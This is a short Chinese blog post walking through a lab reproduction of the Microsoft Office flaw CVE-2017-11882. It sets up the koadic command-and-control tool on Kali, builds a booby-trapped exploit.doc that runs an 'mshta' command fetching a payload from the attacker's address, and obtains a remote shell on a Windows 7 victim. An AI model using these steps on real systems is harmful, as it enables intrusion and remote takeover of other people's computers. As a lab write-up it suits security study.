漏洞复现

CVE-2017-11882漏洞复现和利用

Posted on 2020-01-02,1 min read

影响版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

实验环境
office2016
Win7
kali
实验步骤
用msf一直复现不成功。。。。
这里通过koadic漏洞复现
下载koadic和poc

https://github.com/guokeya/tools/koadic-master.zip
https://github.com/guokeya/tools/CVE-2017-11882.zip

将koadic和Poc都拖入kali
./koadic运行

Set lhost 192.168.47.140
Set lport 1234
Run

这里返回了一个URL:http://192.168.47.140:1234/ZxMtV
下面就要用poc生成一个包含以上URL恶意代码的doc文件

python Command109b_CVE-2017-11882.py -c “mshta http://192.168.47.140:1234/ZxMtV” -o exploit.doc

拖入win7,运行下,成功返回shell

在koadic执行zombies 0 切换到项目
cmdshell 0 获取shell

下一篇: Centos 6.5安装完LNMP后的加固→